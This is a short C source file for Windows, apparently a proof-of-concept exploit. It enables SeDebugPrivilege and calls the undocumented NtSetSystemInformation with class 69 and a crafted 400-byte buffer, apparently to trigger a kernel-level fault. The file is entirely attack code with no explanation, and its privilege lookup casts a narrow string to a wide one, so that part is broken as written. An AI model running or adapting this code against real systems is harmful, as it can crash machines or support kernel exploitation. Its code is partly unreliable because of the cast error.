#include <windows.h>
#include <stdio.h>

typedef ULONG NTSTATUS;

typedef (NTAPI *LPNTSETSYSTEMINFORMATION) (IN DWORD, IN PVOID, IN ULONG);

#define LENGTH_MEM 400 // must be between 40 and 4136 bytes

BOOL WINAPI EnablePrivilege(LPCSTR lpPrivilegeName, BOOL bEnable)
{
    TOKEN_PRIVILEGES Privileges;                
    HANDLE hToken;
    BOOL bResult;
    OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken);
    Privileges.PrivilegeCount = 1;
    Privileges.Privileges[0].Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;
    if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpPrivilegeName, &Privileges.Privileges[0].Luid)) {
        CloseHandle(hToken);
        return FALSE;
    }
    bResult = AdjustTokenPrivileges(hToken, FALSE, &Privileges, 0, NULL, NULL);
    CloseHandle(hToken);
    return bResult;
}

int main()
{
 LPNTSETSYSTEMINFORMATION fNtSetSystemInformation;
 char* mem;
 NTSTATUS Status;
 
 char* sdn="SeDebugPrivilege";
 EnablePrivilege(sdn, TRUE);

 fNtSetSystemInformation = (LPNTSETSYSTEMINFORMATION) GetProcAddress( GetModuleHandleA("ntdll.dll"), "NtSetSystemInformation");

 if ( fNtSetSystemInformation == NULL ) {
  fprintf(stderr, "Cannot find ntdll!NtSetSystemInformation\n");
  return 1;
 }
 
 mem = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, LENGTH_MEM); 
 
 mem[3] = 0xD8;

 Status = fNtSetSystemInformation(69, mem, LENGTH_MEM);

 printf("Status = %08X\n", Status );
 getc(stdin);

 return 0;
}